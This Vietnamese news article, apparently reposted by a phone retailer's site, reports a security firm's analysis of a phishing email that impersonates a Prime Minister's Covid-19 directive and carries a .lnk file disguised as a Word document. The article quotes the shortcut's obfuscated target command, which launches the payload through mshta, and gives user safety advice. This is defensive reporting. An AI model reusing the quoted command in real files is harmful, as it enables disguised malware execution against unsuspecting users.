Xuất hiện email mạo danh thông báo của Thủ tướng chính phủ để phát tán mã độc

Mã độc được chèn trong một tệp văn bản với tiêu đề "Chi thi cua Thu tuong Nguyen Xuan Phuc" nhằm đánh lừa người dùng. Mẫu mã độc này mới được thu thập được qua hệ thống CMC Threat Intelligence.



Cụ thể, theo phân tích của Công ty CMC Cyber Security, file mẫu là một file shortcut có phần mở rộng là ".lnk" được ẩn dưới dạng một file Word nhằm đánh lừa người dùng do đuôi ".lnk" sẽ được hệ điều hành Windows ẩn đi.

Tuy nhiên, theo các chuyên gia, file Word này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: "%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i".


Xuất hiện email mạo danh thông báo của Thủ tướng chính phủ để phát tán mã độc

Mã độc được phát tán qua email giả dạng thông báo của Thủ tướng Chính phủ về dịch Covid-19


Các chuyên gia CMC Cyber Security cho biết sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ có thể tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…

"Hiện tượng lợi dụng các nội dung, thông tin nhạy cảm để phát tán mã độc đã, đang diễn ra hằng ngày không chỉ riêng các thông tin về Covid-19 mà còn nhiều thông tin khác. Nếu người dùng không cẩn thận khi click, mở các file chứa mã độc, người dùng có thể bị mất các thông tin cá nhân, ngoài ra các hacker có thể lợi dụng tài khoản lấy được của người dùng để lan truyền tin tức giả, phát tán mã độc", chuyên gia bảo mật cảnh báo.

"Trường hợp bắt buộc phải tải file về nhưng thấy có nghi ngờ về nội dung hoặc người gửi thì người dùng cần chuyển tiếp email đó vào một email tạm thời khác và dùng một máy khác, tách biệt khỏi mạng đang làm việc để mở file. Nếu nắm về kỹ thuật hơn nữa thì có thể thử mở các file nghi ngờ tại các môi trường an toàn hơn (như máy ảo)", chuyên giao bảo mật lưu ý thêm.

Bạn có nhận được những email với nội dung tương tự không? Nhớ đề cao cảnh giác hơn nhé.



Hiện tại, nhằm giúp quý độc giả nắm bắt được những thông tin công nghệ mới nhất, nóng hổi nhất, Di Động V24h xin gửi tới quý độc giả fanpage:" Trang tin tức công nghệ V24h", tại đây các thông tin về công nghệ sẽ luôn được cập nhật thường xuyên và liên tục 24/24.

Hãy like page V24h.vn theo đường link sau: https://www.facebook.com/v24h.vn/
Hoặc truy cập website V24h.vn để đọc ngay những tin tức công nghệ cực hot.



Di động V24h - Hệ thống điện thoại bảo hành tốt nhất


iPhone - Xiaomi số 1 Hải Phòng


Dịch vụ mua trả góp điện thoại (iPhone – Samsung - Xiaomi) tại Hải Phòng.

Địa chỉ: 199 Lạch Tray, Ngô Quyền,Hải Phòng.

☎ Hotline : 037.845.9999

Tư vấn sim : 037.468.4444

Youtube Channel : https://goo.gl/b8V5zN

Tham gia Group chia sẻ nhận nhiều ưu đãi: https://www.facebook.com/groups/didongv24h

Bình luận

0
V24h.vn back to top